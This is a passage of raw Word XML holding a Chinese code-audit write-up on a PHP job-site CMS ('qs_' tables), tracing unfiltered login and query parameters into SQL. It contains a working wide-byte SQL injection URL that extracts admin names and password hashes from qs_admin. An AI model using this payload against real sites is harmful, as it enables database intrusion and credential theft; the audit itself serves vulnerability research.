        </w:rPr>
        <w:t>获取的值给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$alphabet, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>$alphabet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:spacing w:val="-67"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>直接插入到了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-50"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:spacing w:val="-66"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>查询语句中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>所以这里造成了注入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:spacing w:line="285" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia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 w:after="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417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spacing w:before="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:line="304" w:lineRule="auto"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>plus/ajax_officebuilding.php?act=alphabet&amp;x=11%d5'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>%20union%20select%201,2,3,c oncat(0x3C2F613E20),5,6,7,concat(0x3C623E5E5F5E203C2F623E,admin_nam e,0x3A,pwd,0x3C623E205E5F5E3C2F623E),9%20from%20qs_admin%23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
          <w:sz w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>注入也是白搭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解不出来，经过多次加密的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>试了十几个一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>都没解出来</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>....</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑"/>
          <w:sz w:val="6"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:spacing w:before="125" w:after="36"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>File:\admin\admin_login.php (42</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:spacing w:val="-84"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="417"/>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Vrinda"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s10048" type="#_x0000_t202" style="width:319.25pt;height:130.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$act =</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>= 'do_login')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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="117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"Expires: Mon, 26 Jul 1997 05:00:00 GMT"); header("Cache-Control: no-cache, must-revalidate"); header("Pragma: no-cache");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="285" w:lineRule="auto"/>
                    <w:ind w:right="1567" w:firstLine="808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color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$admin_name = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>isset(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$_POST['admin_name']) ? </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$_POST['admin_name']) : ''; //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没过滤</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>~~~</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="26"/>
                    <w:ind w:left="80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$admin_pwd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isset(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$_POS</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>T['admin_pwd']) ?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Vrind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47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trim(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$_POST['admin_pwd']) : '';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$postcaptcha</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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=</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-61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isset(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$_POST['postcaptcha'])</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:spacing w:val="-60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?</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda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'postcaptcha'] :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'';</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="307" w:lineRule="auto"/>
                    <w:ind w:right="1750" w:firstLine="808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$remember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isset(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$_POST['rememberme']) ?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intval(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$_POST['rememberme']) : 0;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24"/>
                    <w:ind w:left="80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$admin_name == '')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8" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="419"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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"Location:?act=login&amp;err=".urlencode('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>用户名不能为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')); exit();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="7"/>
                    <w:ind w:left="80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80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$admin_pwd == '')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7" w:line="302" w:lineRule="auto"/>
                    <w:ind w:left="720" w:right="599"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrind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"Location:?act=login&amp;err=".urlencode('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>密码不能为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>')); exit();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="9"/>
                    <w:ind w:left="80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$captcha=get_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cache(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'captcha');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empty($postcaptcha) &amp;&amp; $captcha['verif</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>y_adminlogin']=='1')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7"/>
                    <w:ind w:left="1440"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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"Location:?act=login&amp;err=".urlencode('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>验证码不能为空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'));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exit(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1"/>
                    <w:ind w:left="80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 w:line="309" w:lineRule="auto"/>
                    <w:ind w:firstLine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($captcha['verify_adminlogin']=='1' &amp;&amp; strcasecmp($_SESSION['imageCaptcha_content'],$postcaptcha)!=0)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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8" w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="1440" w:right="44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write_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log(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"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>验证码填写错误</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>",$admin_name,2); header("</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>Location:?act=login&amp;err=".urlencode('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>验证码填写错误</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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'));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exit(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47"/>
                    <w:ind w:left="809"/>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsi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color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>elseif(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>check_admin($admin_name,$admin_pwd)) //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关键函数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直接带</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="52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入进去了</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="111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footerReference w:type="default" r:id="rId26"/>
          <w:pgSz w:w="9980" w:h="14190"/>
          <w:pgMar w:top="1340" w:right="1380" w:bottom="1160" w:left="1380" w:header="0" w:footer="978" w:gutter="0"/>
          <w:pgNumType w:start="4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46" type="#_x0000_t202" style="width:319.25pt;height:374.9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 w:line="295" w:lineRule="auto"/>
                    <w:ind w:left="1440" w:right="1173" w:firstLine="88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update_admin_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info(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$admin_name); write_log("</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>成功登录</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>",$admin_name); if($remember == 1)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="17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1" w:line="309" w:lineRule="auto"/>
                    <w:ind w:left="2249" w:right="-12" w:hanging="8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$admininfo=get_admin_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one(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$admin_name); setcookie('Qishi[admin_id]', $_SESSION['admin_id'],</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2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time(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)+86400, $QS_cookiepath, $QS_cookiedomain);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="486" w:firstLine="2248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setcookie(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'Qishi[admin_name]', $</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>admin_name, time()+86400, $QS_cookiepath, $QS_cookiedomain);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2" w:line="309" w:lineRule="auto"/>
                    <w:ind w:right="300" w:firstLine="21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setcookie('Qishi[admin_pwd]', md5($admin_name.$admininfo['pwd'].$admininfo['pwd_hash'].$QS_pwdhash), time()+86400, $QS_cookiepath, $QS_cookiedomain);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="2"/>
                    <w:ind w:left="152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80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</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/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5" w:line="280" w:lineRule="auto"/>
                    <w:ind w:left="1440" w:right="44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write_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log(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"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>用户名或密码错误</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>"</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>,$admin_name,2); header("Location:?act=login&amp;err=".urlencode('</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>用户名或密码错</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="6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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>误</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>'));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exit(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3"/>
                    <w:ind w:left="80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"Location: admin_index.php");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="7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80020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="168" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">$admin_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>经过了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-88"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">check_admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处理。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="42"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继续追下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-80"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">check_admin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="51"/>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:shape id="_x0000_s10045" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:89.85pt;margin-top:18.8pt;width:319.25pt;height:97.8pt;z-index:2056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6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function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check_admin($name,$pwd)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global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$db,$QS_pwdhash;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="155" w:line="285" w:lineRule="auto"/>
                    <w:ind w:firstLine="54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color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$admin=get_admin_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>one(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>$name);</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:spacing w:val="-72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color w:val="FF0000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先把程序</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="FF0000"/>
                      <w:spacing w:val="-58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color w:val="FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>name</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda" w:eastAsia="Vrinda"/>
                      <w:color w:val="FF0000"/>
                      <w:spacing w:val="-76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带入了这个函数进行了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FF0000"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>一次查询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 w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">\admin\include\admin_common.fun.php (197 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr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417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shape id="_x0000_s10044" type="#_x0000_t202" style="width:319.25pt;height:163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$md5_pwd=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md5(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$pwd.$admin['pwd_hash'].$QS_pwdhash);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73" w:line="309" w:lineRule="auto"/>
                    <w:ind w:firstLine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$row = $db-&gt;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getone(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</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/>
                      <w:sz w:val="18"/>
                    </w:rPr>
                    <w:t>SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$name' and pwd ='"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md5_pwd."'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Vrinda"/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");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:line="255" w:lineRule="exac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继续查询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$row['num'] &gt; 0){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:spacing w:before="73"/>
                    <w:ind w:left="116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return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true;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116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return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false;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7"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="13"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="313" w:lineRule="exact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再看看</w:t>
      </w:r>
      <w:r>
        <w:rPr>
